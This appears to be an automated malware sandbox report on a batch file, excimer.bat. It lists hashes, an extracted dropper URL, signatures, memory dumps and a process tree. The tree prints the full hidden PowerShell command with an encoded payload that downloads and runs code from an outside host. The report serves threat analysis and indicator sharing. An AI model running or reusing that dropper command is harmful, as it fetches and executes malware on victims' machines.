Overview

overview

10

Static

static

Document.lnk

windows7-x64

3

Document.lnk

windows10-2004-x64

3

ted/excimer.bat

windows7-x64

10

ted/excimer.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    45s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2022 17:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ted/excimer.bat

  • Size

    1KB

  • MD5

    ca2f2dbe229b11a5d19532a095517786

  • SHA1

    117f789e962dfff480309a766e84fce9dd9ab528

  • SHA256

    c4762afcd5bfc15315081453004ab88bd0dbaafa74ca58b4f6f8fb920e1c8a8c

  • SHA512

    42dab7cf697ba6d40a4d75531e723064f6144703c0227c4d34b2eed000a9a5ba5e4a1342e2617a78ce51b9e370475a29601c522509acb626ad510bb5b21d84dd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://meeronixt.com/gate

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ted\excimer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBlAGUAcgBvAG4AaQB4AHQALgBjAG8AbQAvAGcAYQB0AGUAIgApAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2012

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2012-55-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2012-56-0x000007FEF39C0000-0x000007FEF43E3000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/2012-58-0x00000000026D4000-0x00000000026D7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2012-57-0x000007FEF2E60000-0x000007FEF39BD000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/2012-59-0x00000000026DB000-0x00000000026FA000-memory.dmp

    Filesize

    124KB

    Download

  • memory/2012-60-0x00000000026D4000-0x00000000026D7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/2012-61-0x00000000026DB000-0x00000000026FA000-memory.dmp

    Filesize

    124KB

    Download